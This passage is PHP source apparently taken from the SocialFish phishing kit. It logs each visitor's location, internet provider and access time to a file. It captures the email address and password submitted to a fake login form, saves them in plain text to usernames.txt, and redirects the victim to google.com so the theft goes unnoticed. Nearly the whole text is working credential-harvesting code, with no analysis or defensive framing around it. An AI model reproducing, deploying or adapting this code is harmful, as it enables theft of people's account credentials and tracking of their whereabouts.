loc.' [6]ISP = ' // latitude, longitude .$details->org.' [7]CITY = ' // internet service provider .$details->city.' [8]STATE = ' // city .$details->region.' [9]COUNTRY = ' // state .$details->country.' [10]DATE & TIME = ' // country .date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date ."\n" ; $write = fputs($fileHandle, $string); @ fclose($fileHandle); } $var = $_POST['Email']; $var2 = $_POST['Passwd']; $myFile = file_get_contents("protect.html"); $searchString = "There's a Phishing Page generated by SocialFish in this website."; if($myFile == $searchString) { file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND); header('Location: https://google.com/'); } if($myFile != $searchString) { echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME"; } exit(); ?>